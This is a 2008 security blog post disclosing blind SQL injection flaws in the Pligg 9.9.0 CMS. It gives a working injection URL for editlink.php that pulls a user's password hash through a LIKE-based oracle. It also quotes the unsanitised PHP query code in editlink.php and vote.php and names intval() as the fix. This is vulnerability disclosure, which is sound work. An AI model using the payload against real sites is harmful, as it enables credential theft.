PornoSecurity

Pligg 9.9.0 SQL Injection Vulnerability

Posted on 2008-04-09 00:48:39 in PornoSecurity

 

Today i wanted to try the Pligg digg-like content management system, after playing with it for a while I found a vulnerability.

The pligg developers fail to sufficiently sanitize user-supplied data before using it in an SQL query making it possibile to inject extra SQL statements. 

 

http://www.example.com/editlink.php?id=1+AND+((SELECT+user_pass+FROM+pligg_users+WHERE+user_login=0x676f64)+LIKE+0x25)+UNION+SELECT+10,2 

 

To exploit this you need the id of a news you submitted(10 in the example) and an id of a news submitted by others(1 in the example), when the LIKE statement matches you get a "Not your link" error.

This is a tipical blind SQL-injection scenario. 

 

UPDATE:  

Trying to write a little patch for a friend of mine i found many other security-related problems in pligg. Many  user-supplied variables are simply not checked or checked in the very wrong way. 

 

•  The first case, editlink.php: 

 

if(isset($_GET['id'])){
  $theid = strip_tags($_GET['id']);
}
if(isset($_POST['id'])){
  $theid = strip_tags($_POST['id']);

}
[...]
$link = $db->get_row("SELECT link_id, link_author FROM " . table_links . 
" WHERE link_id=".$theid.";")
[...]
$linkres->id=$link_id = strip_tags($_POST['id']);
$linkres->read();   

libs/link.php:

function read($usecache = TRUE) {
 $id = $this->id;
 $link = $db->get_row("SELECT " . table_links . ".* FROM " . table_links 
. " WHERE link_id = $id");
}

 

 

• Another one, vote.php:
  

 

$link->id=$_POST['id'];
$link->read_basic();

link/link.php:

function read_basic() {
[...]
$id = $this->id;
$db->get_row("SELECT link_comments, link_author, link_status, link_randkey, link_category, link_date, link_votes, link_karma,link_published_date FROM " . table_links . " WHERE link_id = $id")

 ..and so on. 

I really dunno why they insist to strip_tags instead of a simple intval() ;) 

 

Nick